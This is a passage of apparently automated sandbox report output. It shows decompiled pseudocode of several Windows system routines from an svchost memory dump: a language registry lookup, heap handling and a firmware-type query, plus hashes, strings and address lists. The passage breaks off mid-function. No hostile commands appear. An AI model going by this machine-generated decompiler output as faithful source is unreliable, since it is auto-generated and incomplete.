                                          • LdrpCompleteMapModule, xrefs: 03A89898
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.434919800.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_3a00000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
                                          • API String ID: 0-1676968949
                                          • Opcode ID: 7064fe49e5dc543081a5b59cf698b9d0ce59001b93f80e81cd1154f92e3229e7
                                          • Instruction ID: 1790a13a8ae043bb714205e022f594f846e82fe606fe4b042b4dd1d2b4130836
                                          • Opcode Fuzzy Hash: 7064fe49e5dc543081a5b59cf698b9d0ce59001b93f80e81cd1154f92e3229e7
                                          • Instruction Fuzzy Hash: 04511371A057419BD722DB68C944B2ABBE4BF42714F280A9FF8619B7E1C731ED00CB50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 03A2E620 Relevance: 3.9, Strings: 3, Instructions: 165COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 93%
                                          			E03A2E620(void* __ecx, short* __edx, short* _a4) {
				char _v16;
				char _v20;
				intOrPtr _v24;
				char* _v28;
				char _v32;
				char _v36;
				char _v44;
				signed int _v48;
				intOrPtr _v52;
				void* _v56;
				void* _v60;
				char _v64;
				void* _v68;
				void* _v76;
				void* _v84;
				signed int _t59;
				signed int _t74;
				signed short* _t75;
				signed int _t76;
				signed short* _t78;
				signed int _t83;
				short* _t93;
				signed short* _t94;
				short* _t96;
				void* _t97;
				signed int _t99;
				void* _t101;
				void* _t102;

				_t80 = __ecx;
				_t101 = (_t99 & 0xfffffff8) - 0x34;
				_t96 = __edx;
				_v44 = __edx;
				_t78 = 0;
				_v56 = 0;
				if(__ecx == 0 || __edx == 0) {
					L28:
					_t97 = 0xc000000d;
				} else {
					_t93 = _a4;
					if(_t93 == 0) {
						goto L28;
					}
					_t78 = E03A2F358(__ecx, 0xac);
					if(_t78 == 0) {
						_t97 = 0xc0000017;
						L6:
						if(_v56 != 0) {
							_push(_v56);
							E03A695D0();
						}
						if(_t78 != 0) {
							L03A477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t78);
						}
						return _t97;
					}
					E03A6FA60(_t78, 0, 0x158);
					_v48 = _v48 & 0x00000000;
					_t102 = _t101 + 0xc;
					 *_t96 = 0;
					 *_t93 = 0;
					E03A6BB40(_t80,  &_v36, L"\\Registry\\Machine\\System\\CurrentControlSet\\Control\\NLS\\Language");
					_v36 = 0x18;
					_v28 =  &_v44;
					_v64 = 0;
					_push( &_v36);
					_push(0x20019);
					_v32 = 0;
					_push( &_v64);
					_v24 = 0x40;
					_v20 = 0;
					_v16 = 0;
					_t97 = E03A69600();
					if(_t97 < 0) {
						goto L6;
					}
					E03A6BB40(0,  &_v36, L"InstallLanguageFallback");
					_push(0);
					_v48 = 4;
					_t97 = L03A2F018(_v64,  &_v44,  &_v56, _t78,  &_v48);
					if(_t97 >= 0) {
						if(_v52 != 1) {
							L17:
							_t97 = 0xc0000001;
							goto L6;
						}
						_t59 =  *_t78 & 0x0000ffff;
						_t94 = _t78;
						_t83 = _t59;
						if(_t59 == 0) {
							L19:
							if(_t83 == 0) {
								L23:
								E03A6BB40(_t83, _t102 + 0x24, _t78);
								if(L03A343C0( &_v48,  &_v64) == 0) {
									goto L17;
								}
								_t84 = _v48;
								 *_v48 = _v56;
								if( *_t94 != 0) {
									E03A6BB40(_t84, _t102 + 0x24, _t94);
									if(L03A343C0( &_v48,  &_v64) != 0) {
										 *_a4 = _v56;
									} else {
										_t97 = 0xc0000001;
										 *_v48 = 0;
									}
								}
								goto L6;
							}
							_t83 = _t83 & 0x0000ffff;
							while(_t83 == 0x20) {
								_t94 =  &(_t94[1]);
								_t74 =  *_t94 & 0x0000ffff;
								_t83 = _t74;
								if(_t74 != 0) {
									continue;
								}
								goto L23;
							}
							goto L23;
						} else {
							goto L14;
						}
						while(1) {
							L14:
							_t27 =  &(_t94[1]); // 0x2
							_t75 = _t27;
							if(_t83 == 0x2c) {
								break;
							}
							_t94 = _t75;
							_t76 =  *_t94 & 0x0000ffff;
							_t83 = _t76;
							if(_t76 != 0) {
								continue;
							}
							goto L23;
						}
						 *_t94 = 0;
						_t94 = _t75;
						_t83 =  *_t75 & 0x0000ffff;
						goto L19;
					}
				}
			}































                                          0x03a2e620
                                          0x03a2e628
                                          0x03a2e62f
                                          0x03a2e631
                                          0x03a2e635
                                          0x03a2e637
                                          0x03a2e63e
                                          0x03a85503
                                          0x03a85503
                                          0x03a2e64c
                                          0x03a2e64c
                                          0x03a2e651
                                          0x00000000
                                          0x00000000
                                          0x03a2e661
                                          0x03a2e665
                                          0x03a8542a
                                          0x03a2e715
                                          0x03a2e71a
                                          0x03a2e71c
                                          0x03a2e720
                                          0x03a2e720
                                          0x03a2e727
                                          0x03a2e736
                                          0x03a2e736
                                          0x03a2e743
                                          0x03a2e743
                                          0x03a2e673
                                          0x03a2e678
                                          0x03a2e67d
                                          0x03a2e682
                                          0x03a2e685
                                          0x03a2e692
                                          0x03a2e69b
                                          0x03a2e6a3
                                          0x03a2e6ad
                                          0x03a2e6b1
                                          0x03a2e6b2
                                          0x03a2e6bb
                                          0x03a2e6bf
                                          0x03a2e6c0
                                          0x03a2e6c8
                                          0x03a2e6cc
                                          0x03a2e6d5
                                          0x03a2e6d9
                                          0x00000000
                                          0x00000000
                                          0x03a2e6e5
                                          0x03a2e6ea
                                          0x03a2e6f9
                                          0x03a2e70b
                                          0x03a2e70f
                                          0x03a85439
                                          0x03a8545e
                                          0x03a8545e
                                          0x00000000
                                          0x03a8545e
                                          0x03a8543b
                                          0x03a8543e
                                          0x03a85440
                                          0x03a85445
                                          0x03a85472
                                          0x03a85475
                                          0x03a8548d
                                          0x03a85493
                                          0x03a854a9
                                          0x00000000
                                          0x00000000
                                          0x03a854ab
                                          0x03a854b4
                                          0x03a854bc
                                          0x03a854c8
                                          0x03a854de
                                          0x03a854fb
                                          0x03a854e0
                                          0x03a854e6
                                          0x03a854eb
                                          0x03a854eb
                                          0x03a854de
                                          0x00000000
                                          0x03a854bc
                                          0x03a85477
                                          0x03a8547a
                                          0x03a85480
                                          0x03a85483
                                          0x03a85486
                                          0x03a8548b
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x03a8548b
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x03a85447
                                          0x03a85447
                                          0x03a85447
                                          0x03a85447
                                          0x03a8544e
                                          0x00000000
                                          0x00000000
                                          0x03a85450
                                          0x03a85452
                                          0x03a85455
                                          0x03a8545a
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x03a8545c
                                          0x03a8546a
                                          0x03a8546d
                                          0x03a8546f
                                          0x00000000
                                          0x03a8546f
                                          0x03a2e70f

                                          Strings
                                          • @, xrefs: 03A2E6C0
                                          • \Registry\Machine\System\CurrentControlSet\Control\NLS\Language, xrefs: 03A2E68C
                                          • InstallLanguageFallback, xrefs: 03A2E6DB
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.434919800.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_3a00000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: @$InstallLanguageFallback$\Registry\Machine\System\CurrentControlSet\Control\NLS\Language
                                          • API String ID: 0-1757540487
                                          • Opcode ID: bd0c0f8b6819e6c3494afa31f077fbf46df2e89a2bc2247948cf9d4ec3e2011a
                                          • Instruction ID: 8980428b382d2bb489f8409ef2dda99c07a3724b4f3ccf3feb8e03b27324593a
                                          • Opcode Fuzzy Hash: bd0c0f8b6819e6c3494afa31f077fbf46df2e89a2bc2247948cf9d4ec3e2011a
                                          • Instruction Fuzzy Hash: 2A51EF769083159BC714EF29C440AABB3E8BF9A714F09096FF995DB240FB34D944C7A2
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 03AEE539 Relevance: 2.8, Strings: 2, Instructions: 261COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 60%
                                          			E03AEE539(unsigned int* __ecx, intOrPtr __edx, signed int _a4, signed int _a8) {
				signed int _v20;
				char _v24;
				signed int _v40;
				char _v44;
				intOrPtr _v48;
				signed int _v52;
				unsigned int _v56;
				char _v60;
				signed int _v64;
				char _v68;
				signed int _v72;
				void* __ebx;
				void* __edi;
				char _t87;
				signed int _t90;
				signed int _t94;
				signed int _t100;
				intOrPtr* _t113;
				signed int _t122;
				void* _t132;
				void* _t135;
				signed int _t139;
				signed int* _t141;
				signed int _t146;
				signed int _t147;
				void* _t153;
				signed int _t155;
				signed int _t159;
				char _t166;
				void* _t172;
				void* _t176;
				signed int _t177;
				intOrPtr* _t179;

				_t179 = __ecx;
				_v48 = __edx;
				_v68 = 0;
				_v72 = 0;
				_push(__ecx[1]);
				_push( *__ecx);
				_push(0);
				_t153 = 0x14;
				_t135 = _t153;
				_t132 = E03AEBBBB(_t135, _t153);
				if(_t132 == 0) {
					_t166 = _v68;
					goto L43;
				} else {
					_t155 = 0;
					_v52 = 0;
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosd");
					_v56 = __ecx[1];
					if( *__ecx >> 8 < 2) {
						_t155 = 1;
						_v52 = 1;
					}
					_t139 = _a4;
					_t87 = (_t155 << 0xc) + _t139;
					_v60 = _t87;
					if(_t87 < _t139) {
						L11:
						_t166 = _v68;
						L12:
						if(_t132 != 0) {
							E03AEBCD2(_t132,  *_t179,  *((intOrPtr*)(_t179 + 4)));
						}
						L43:
						if(_v72 != 0) {
							_push( *((intOrPtr*)(_t179 + 4)));
							_push( *_t179);
							_push(0x8000);
							E03AEAFDE( &_v72,  &_v60);
						}
						L46:
						return _t166;
					}
					_t90 =  *(_t179 + 0xc) & 0x40000000;
					asm("sbb edi, edi");
					_t172 = ( ~_t90 & 0x0000003c) + 4;
					if(_t90 != 0) {
						_push(0);
						_push(0x14);
						_push( &_v44);
						_push(3);
						_push(_t179);
						_push(0xffffffff);
						if(E03A69730() < 0 || (_v40 & 0x00000060) == 0 || _v44 != _t179) {
							_push(_t139);
							E03AEA80D(_t179, 1, _v40, 0);
							_t172 = 4;
						}
					}
					_t141 =  &_v72;
					if(E03AEA854(_t141,  &_v60, 0, 0x2000, _t172, _t179,  *_t179,  *((intOrPtr*)(_t179 + 4))) >= 0) {
						_v64 = _a4;
						_t94 =  *(_t179 + 0xc) & 0x40000000;
						asm("sbb edi, edi");
						_t176 = ( ~_t94 & 0x0000003c) + 4;
						if(_t94 != 0) {
							_push(0);
							_push(0x14);
							_push( &_v24);
							_push(3);
							_push(_t179);
							_push(0xffffffff);
							if(E03A69730() < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t179) {
								_push(_t141);
								E03AEA80D(_t179, 1, _v20, 0);
								_t176 = 4;
							}
						}
						if(E03AEA854( &_v72,  &_v64, 0, 0x1000, _t176, 0,  *_t179,  *((intOrPtr*)(_t179 + 4))) < 0) {
							goto L11;
						} else {
							_t177 = _v64;
							 *((intOrPtr*)(_t132 + 0xc)) = _v72;
							_t100 = _v52 + _v52;
							_t146 =  *(_t132 + 0x10) & 0x00000ffd | _t177 & 0xfffff000 | _t100;
							 *(_t132 + 0x10) = _t146;
							asm("bsf eax, [esp+0x18]");
							_v52 = _t100;
							 *(_t132 + 0x10) = (_t100 << 0x00000002 ^ _t146) & 0x000000fc ^ _t146;
							 *((short*)(_t132 + 0xc)) = _t177 - _v48;
							_t47 =  &_a8;
							 *_t47 = _a8 & 0x00000001;
							if( *_t47 == 0) {
								E03A42280(_t179 + 0x30, _t179 + 0x30);
							}
							_t147 =  *(_t179 + 0x34);
							_t159 =  *(_t179 + 0x38) & 1;
							_v68 = 0;
							if(_t147 == 0) {
								L35:
								E03A3B090(_t179 + 0x34, _t147, _v68, _t132);
								if(_a8 == 0) {
									E03A3FFB0(_t132, _t177, _t179 + 0x30);
								}
								asm("lock xadd [eax], ecx");
								asm("lock xadd [eax], edx");
								_t132 = 0;
								_v72 = _v72 & 0;
								_v68 = _v72;
								if(E03A47D50() == 0) {
									_t113 = 0x7ffe0388;
								} else {
									_t177 = _v64;
									_t113 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
								}
								if( *_t113 == _t132) {
									_t166 = _v68;
									goto L46;
								} else {
									_t166 = _v68;
									E03ADFEC0(_t132, _t179, _t166, _t177 + 0x1000);
									goto L12;
								}
							} else {
								L23:
								while(1) {
									if(_v72 < ( *(_t147 + 0xc) & 0xffff0000)) {
										_t122 =  *_t147;
										if(_t159 == 0) {
											L32:
											if(_t122 == 0) {
												L34:
												_v68 = 0;
												goto L35;
											}
											L33:
											_t147 = _t122;
											continue;
										}
										if(_t122 == 0) {
											goto L34;
										}
										_t122 = _t122 ^ _t147;
										goto L32;
									}
									_t122 =  *(_t147 + 4);
									if(_t159 == 0) {
										L27:
										if(_t122 != 0) {
											goto L33;
										}
										L28:
										_v68 = 1;
										goto L35;
									}
									if(_t122 == 0) {
										goto L28;
									}
									_t122 = _t122 ^ _t147;
									goto L27;
								}
							}
						}
					}
					_v72 = _v72 & 0x00000000;
					goto L11;
				}
			}




































                                          0x03aee547
                                          0x03aee549
                                          0x03aee54f
                                          0x03aee553
                                          0x03aee557
                                          0x03aee55a
                                          0x03aee55c
                                          0x03aee55f
                                          0x03aee561
                                          0x03aee567
                                          0x03aee56b
                                          0x03aee7e2
                                          0x00000000
                                          0x03aee571
                                          0x03aee575
                                          0x03aee577
                                          0x03aee57b
                                          0x03aee57c
                                          0x03aee57d
                                          0x03aee57e
                                          0x03aee57f
                                          0x03aee588
                                          0x03aee58f
                                          0x03aee591
                                          0x03aee592
                                          0x03aee592
                                          0x03aee596
                                          0x03aee59e
                                          0x03aee5a0
                                          0x03aee5a6
                                          0x03aee61d
                                          0x03aee61d
                                          0x03aee621
                                          0x03aee623
                                          0x03aee630
                                          0x03aee630
                                          0x03aee7e6
                                          0x03aee7eb
                                          0x03aee7ed
                                          0x03aee7f4
                                          0x03aee7fa
                                          0x03aee7ff
                                          0x03aee7ff
                                          0x03aee80a
                                          0x03aee812
                                          0x03aee812
                                          0x03aee5ab
                                          0x03aee5b4
                                          0x03aee5b9
                                          0x03aee5be
                                          0x03aee5c0
                                          0x03aee5c2
                                          0x03aee5c8
                                          0x03aee5c9
                                          0x03aee5cb
                                          0x03aee5cc
                                          0x03aee5d5
                                          0x03aee5e4
                                          0x03aee5f1
                                          0x03aee5f8
                                          0x03aee5f8
                                          0x03aee5d5
                                          0x03aee602
                                          0x03aee616
                                          0x03aee63d
                                          0x03aee644
                                          0x03aee64d
                                          0x03aee652
                                          0x03aee657
                                          0x03aee659
                                          0x03aee65b
                                          0x03aee661
                                          0x03aee662
                                          0x03aee664
                                          0x03aee665
                                          0x03aee66e
                                          0x03aee67d
                                          0x03aee68a
                                          0x03aee691
                                          0x03aee691
                                          0x03aee66e
                                          0x03aee6b0
                                          0x00000000
                                          0x03aee6b6
                                          0x03aee6bd
                                          0x03aee6c7
                                          0x03aee6d7
                                          0x03aee6d9
                                          0x03aee6db
                                          0x03aee6de
                                          0x03aee6e3
                                          0x03aee6f3
                                          0x03aee6fc
                                          0x03aee700
                                          0x03aee700
                                          0x03aee704
                                          0x03aee70a
                                          0x03aee70a
                                          0x03aee713
                                          0x03aee716
                                          0x03aee719
                                          0x03aee720
                                          0x03aee761
                                          0x03aee76b
                                          0x03aee774
                                          0x03aee77a
                                          0x03aee77a
                                          0x03aee78a
                                          0x03aee791
                                          0x03aee799
                                          0x03aee79b
                                          0x03aee79f
                                          0x03aee7aa
                                          0x03aee7c0
                                          0x03aee7ac
                                          0x03aee7b2
                                          0x03aee7b9
                                          0x03aee7b9
                                          0x03aee7c7
                                          0x03aee806
                                          0x00000000
                                          0x03aee7c9
                                          0x03aee7d1
                                          0x03aee7d8
                                          0x00000000
                                          0x03aee7d8
                                          0x00000000
                                          0x00000000
                                          0x03aee722
                                          0x03aee72e
                                          0x03aee748
                                          0x03aee74c
                                          0x03aee754
                                          0x03aee756
                                          0x03aee75c
                                          0x03aee75c
                                          0x00000000
                                          0x03aee75c
                                          0x03aee758
                                          0x03aee758
                                          0x00000000
                                          0x03aee758
                                          0x03aee750
                                          0x00000000
                                          0x00000000
                                          0x03aee752
                                          0x00000000
                                          0x03aee752
                                          0x03aee730
                                          0x03aee735
                                          0x03aee73d
                                          0x03aee73f
                                          0x00000000
                                          0x00000000
                                          0x03aee741
                                          0x03aee741
                                          0x00000000
                                          0x03aee741
                                          0x03aee739
                                          0x00000000
                                          0x00000000
                                          0x03aee73b
                                          0x00000000
                                          0x03aee73b
                                          0x03aee722
                                          0x03aee720
                                          0x03aee6b0
                                          0x03aee618
                                          0x00000000
                                          0x03aee618

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.434919800.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_3a00000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: `$`
                                          • API String ID: 0-197956300
                                          • Opcode ID: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
                                          • Instruction ID: 9e8650a14ebe93d6a1525dcd98b68ca9339a7f15e9fce95325bc9820f31644fb
                                          • Opcode Fuzzy Hash: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
                                          • Instruction Fuzzy Hash: 9F919F356043419FE724CF25C941F1BB7E6AF85714F18892EF9A9CB290E774E904CB62
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 03AA51BE Relevance: 2.7, Strings: 2, Instructions: 173COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 77%
                                          			E03AA51BE(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				signed short* _t63;
				signed int _t64;
				signed int _t65;
				signed int _t67;
				intOrPtr _t74;
				intOrPtr _t84;
				intOrPtr _t88;
				intOrPtr _t94;
				void* _t100;
				void* _t103;
				intOrPtr _t105;
				signed int _t106;
				short* _t108;
				signed int _t110;
				signed int _t113;
				signed int* _t115;
				signed short* _t117;
				void* _t118;
				void* _t119;

				_push(0x80);
				_push(0x3b005f0);
				E03A7D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t118 - 0x80)) = __edx;
				_t115 =  *(_t118 + 0xc);
				 *(_t118 - 0x7c) = _t115;
				 *((char*)(_t118 - 0x65)) = 0;
				 *((intOrPtr*)(_t118 - 0x64)) = 0;
				_t113 = 0;
				 *((intOrPtr*)(_t118 - 0x6c)) = 0;
				 *((intOrPtr*)(_t118 - 4)) = 0;
				_t100 = __ecx;
				if(_t100 == 0) {
					 *(_t118 - 0x90) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
					E03A3EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
					 *((char*)(_t118 - 0x65)) = 1;
					_t63 =  *(_t118 - 0x90);
					_t101 = _t63[2];
					_t64 =  *_t63 & 0x0000ffff;
					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
					L20:
					_t65 = _t64 >> 1;
					L21:
					_t108 =  *((intOrPtr*)(_t118 - 0x80));
					if(_t108 == 0) {
						L27:
						 *_t115 = _t65 + 1;
						_t67 = 0xc0000023;
						L28:
						 *((intOrPtr*)(_t118 - 0x64)) = _t67;
						L29:
						 *((intOrPtr*)(_t118 - 4)) = 0xfffffffe;
						E03AA53CA(0);
						return E03A7D130(0, _t113, _t115);
					}
					if(_t65 >=  *((intOrPtr*)(_t118 + 8))) {
						if(_t108 != 0 &&  *((intOrPtr*)(_t118 + 8)) >= 1) {
							 *_t108 = 0;
						}
						goto L27;
					}
					 *_t115 = _t65;
					_t115 = _t65 + _t65;
					E03A6F3E0(_t108, _t101, _t115);
					 *((short*)(_t115 +  *((intOrPtr*)(_t118 - 0x80)))) = 0;
					_t67 = 0;
					goto L28;
				}
				_t103 = _t100 - 1;
				if(_t103 == 0) {
					_t117 =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38;
					_t74 = E03A43690(1, _t117, 0x3a01810, _t118 - 0x74);
					 *((intOrPtr*)(_t118 - 0x64)) = _t74;
					_t101 = _t117[2];
					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
					if(_t74 < 0) {
						_t64 =  *_t117 & 0x0000ffff;
						_t115 =  *(_t118 - 0x7c);
						goto L20;
					}
					_t65 = (( *(_t118 - 0x74) & 0x0000ffff) >> 1) + 1;
					_t115 =  *(_t118 - 0x7c);
					goto L21;
				}
				if(_t103 == 1) {
					_t105 = 4;
					 *((intOrPtr*)(_t118 - 0x78)) = _t105;
					 *((intOrPtr*)(_t118 - 0x70)) = 0;
					_push(_t118 - 0x70);
					_push(0);
					_push(0);
					_push(_t105);
					_push(_t118 - 0x78);
					_push(0x6b);
					 *((intOrPtr*)(_t118 - 0x64)) = E03A6AA90();
					 *((intOrPtr*)(_t118 - 0x64)) = 0;
					_t113 = L03A44620(_t105,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8,  *((intOrPtr*)(_t118 - 0x70)));
					 *((intOrPtr*)(_t118 - 0x6c)) = _t113;
					if(_t113 != 0) {
						_push(_t118 - 0x70);
						_push( *((intOrPtr*)(_t118 - 0x70)));
						_push(_t113);
						_push(4);
						_push(_t118 - 0x78);
						_push(0x6b);
						_t84 = E03A6AA90();
						 *((intOrPtr*)(_t118 - 0x64)) = _t84;
						if(_t84 < 0) {
							goto L29;
						}
						_t110 = 0;
						_t106 = 0;
						while(1) {
							 *((intOrPtr*)(_t118 - 0x84)) = _t110;
							 *(_t118 - 0x88) = _t106;
							if(_t106 >= ( *(_t113 + 0xa) & 0x0000ffff)) {
								break;
							}
							_t110 = _t110 + ( *(_t106 * 0x2c + _t113 + 0x21) & 0x000000ff);
							_t106 = _t106 + 1;
						}
						_t88 = E03AA500E(_t106, _t118 - 0x3c, 0x20, _t118 - 0x8c, 0, 0, L"%u", _t110);
						_t119 = _t119 + 0x1c;
						 *((intOrPtr*)(_t118 - 0x64)) = _t88;
						if(_t88 < 0) {
							goto L29;
						}
						_t101 = _t118 - 0x3c;
						_t65 =  *((intOrPtr*)(_t118 - 0x8c)) - _t118 - 0x3c >> 1;
						goto L21;
					}
					_t67 = 0xc0000017;
					goto L28;
				}
				_push(0);
				_push(0x20);
				_push(_t118 - 0x60);
				_push(0x5a);
				_t94 = E03A69860();
				 *((intOrPtr*)(_t118 - 0x64)) = _t94;
				if(_t94 < 0) {
					goto L29;
				}
				if( *((intOrPtr*)(_t118 - 0x50)) == 1) {
					_t101 = L"Legacy";
					_push(6);
				} else {
					_t101 = L"UEFI";
					_push(4);
				}
				_pop(_t65);
				goto L21;
			}






















                                          0x03aa51be
                                          0x03aa51c3
                                          0x03aa51c8
                                          0x03aa51cd
                                          0x03aa51d0
                                          0x03aa51d3
                                          0x03aa51d8
                                          0x03aa51db
                                          0x03aa51de
                                          0x03aa51e0
                                          0x03aa51e3
                                          0x03aa51e6
                                          0x03aa51e8
                                          0x03aa5342
                                          0x03aa5351
                                          0x03aa5356
                                          0x03aa535a
                                          0x03aa5360
                                          0x03aa5363
                                          0x03aa5366
                                          0x03aa5369
                                          0x03aa5369
                                          0x03aa536b
                                          0x03aa536b
                                          0x03aa5370
                                          0x03aa53a3
                                          0x03aa53a4
                                          0x03aa53a6
                                          0x03aa53ab
                                          0x03aa53ab
                                          0x03aa53ae
                                          0x03aa53ae
                                          0x03aa53b5
                                          0x03aa53bf
                                          0x03aa53bf
                                          0x03aa5375
                                          0x03aa5396
                                          0x03aa53a0
                                          0x03aa53a0
                                          0x00000000
                                          0x03aa5396
                                          0x03aa5377
                                          0x03aa5379
                                          0x03aa537f
                                          0x03aa538c
                                          0x03aa5390
                                          0x00000000
                                          0x03aa5390
                                          0x03aa51ee
                                          0x03aa51f1
                                          0x03aa5301
                                          0x03aa5310
                                          0x03aa5315
                                          0x03aa5318
                                          0x03aa531b
                                          0x03aa5320
                                          0x03aa532e
                                          0x03aa5331
                                          0x00000000
                                          0x03aa5331
                                          0x03aa5328
                                          0x03aa5329
                                          0x00000000
                                          0x03aa5329
                                          0x03aa51fa
                                          0x03aa5235
                                          0x03aa5236
                                          0x03aa5239
                                          0x03aa523f
                                          0x03aa5240
                                          0x03aa5241
                                          0x03aa5242
                                          0x03aa5246
                                          0x03aa5247
                                          0x03aa524e
                                          0x03aa5251
                                          0x03aa5267
                                          0x03aa5269
                                          0x03aa526e
                                          0x03aa527d
                                          0x03aa527e
                                          0x03aa5281
                                          0x03aa5282
                                          0x03aa5287
                                          0x03aa5288
                                          0x03aa528a
                                          0x03aa528f
                                          0x03aa5294
                                          0x00000000
                                          0x00000000
                                          0x03aa529a
                                          0x03aa529c
                                          0x03aa529e
                                          0x03aa529e
                                          0x03aa52a4
                                          0x03aa52b0
                                          0x00000000
                                          0x00000000
                                          0x03aa52ba
                                          0x03aa52bc
                                          0x03aa52bc
                                          0x03aa52d4
                                          0x03aa52d9
                                          0x03aa52dc
                                          0x03aa52e1
                                          0x00000000
                                          0x00000000
                                          0x03aa52e7
                                          0x03aa52f4
                                          0x00000000
                                          0x03aa52f4
                                          0x03aa5270
                                          0x00000000
                                          0x03aa5270
                                          0x03aa51fc
                                          0x03aa51fd
                                          0x03aa5202
                                          0x03aa5203
                                          0x03aa5205
                                          0x03aa520a
                                          0x03aa520f
                                          0x00000000
                                          0x00000000
                                          0x03aa521b
                                          0x03aa5226
                                          0x03aa522b
                                          0x03aa521d
                                          0x03aa521d
                                          0x03aa5222
                                          0x03aa5222
                                          0x03aa522d
                                          0x00000000

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.434919800.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_3a00000_svchost.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID: Legacy$UEFI
                                          • API String ID: 2994545307-634100481
                                          • Opcode ID: 2fec2af3934aed42ce11c6ecfcfe45353c7b96995e43c5c4e821e4ac274c5824
                                          • Instruction ID: fc530a7c71fdd0ac00120890d2b8e677e40c0a497e0802847a813bf8589160da
                                          • Opcode Fuzzy Hash: 2fec2af3934aed42ce11c6ecfcfe45353c7b96995e43c5c4e821e4ac274c5824
                                          • Instruction Fuzzy Hash: 9D516FB2E00B089FDB24DFA8C990AAEB7F8BF85700F14406EE549EB251D771D901CB64
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 03A2B171 Relevance: 1.7, APIs: 1, Instructions: 166COMMONLIBRARYCODE
                                          Download Yara Rule
                                          C-Code - Quality: 78%
                                          			E03A2B171(signed short __ebx, intOrPtr __ecx, intOrPtr* __edx, intOrPtr* __edi, signed short __esi, void* __eflags) {
				signed int _t65;
				signed short _t69;
				intOrPtr _t70;
				signed short _t85;
				void* _t86;
				signed short _t89;
				signed short _t91;
				intOrPtr _t92;
				intOrPtr _t97;
				intOrPtr* _t98;
				signed short _t99;
				signed short _t101;
				void* _t102;
				char* _t103;
				signed short _t104;
				intOrPtr* _t110;
				void* _t111;
				void* _t114;
				intOrPtr* _t115;

				_t109 = __esi;
				_t108 = __edi;
				_t106 = __edx;
				_t95 = __ebx;
				_push(0x90);
				_push(0x3aff7a8);
				E03A7D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t114 - 0x9c)) = __edx;
				 *((intOrPtr*)(_t114 - 0x84)) = __ecx;
				 *((intOrPtr*)(_t114 - 0x8c)) =  *((intOrPtr*)(_t114 + 0xc));
				 *((intOrPtr*)(_t114 - 0x88)) =  *((intOrPtr*)(_t114 + 0x10));
				 *((intOrPtr*)(_t114 - 0x78)) =  *[fs:0x18];
				if(__edx == 0xffffffff) {
					L6:
					_t97 =  *((intOrPtr*)(_t114 - 0x78));
					_t65 =  *(_t97 + 0xfca) & 0x0000ffff;
					__eflags = _t65 & 0x00000002;
					if((_t65 & 0x00000002) != 0) {
						L3:
						L4:
						return E03A7D130(_t95, _t108, _t109);
					}
					 *(_t97 + 0xfca) = _t65 | 0x00000002;
					_t108 = 0;
					_t109 = 0;
					_t95 = 0;
					__eflags = 0;
					while(1) {
						__eflags = _t95 - 0x200;
						if(_t95 >= 0x200) {
							break;
						}
						E03A6D000(0x80);
						 *((intOrPtr*)(_t114 - 0x18)) = _t115;
						_t108 = _t115;
						_t95 = _t95 - 0xffffff80;
						_t17 = _t114 - 4;
						 *_t17 =  *(_t114 - 4) & 0x00000000;
						__eflags =  *_t17;
						_t106 =  *((intOrPtr*)(_t114 - 0x84));
						_t110 =  *((intOrPtr*)(_t114 - 0x84));
						_t102 = _t110 + 1;
						do {
							_t85 =  *_t110;
							_t110 = _t110 + 1;
							__eflags = _t85;
						} while (_t85 != 0);
						_t111 = _t110 - _t102;
						_t21 = _t95 - 1; // -129
						_t86 = _t21;
						__eflags = _t111 - _t86;
						if(_t111 > _t86) {
							_t111 = _t86;
						}
						E03A6F3E0(_t108, _t106, _t111);
						_t115 = _t115 + 0xc;
						_t103 = _t111 + _t108;
						 *((intOrPtr*)(_t114 - 0x80)) = _t103;
						_t89 = _t95 - _t111;
						__eflags = _t89;
						_push(0);
						if(_t89 == 0) {
							L15:
							_t109 = 0xc000000d;
							goto L16;
						} else {
							__eflags = _t89 - 0x7fffffff;
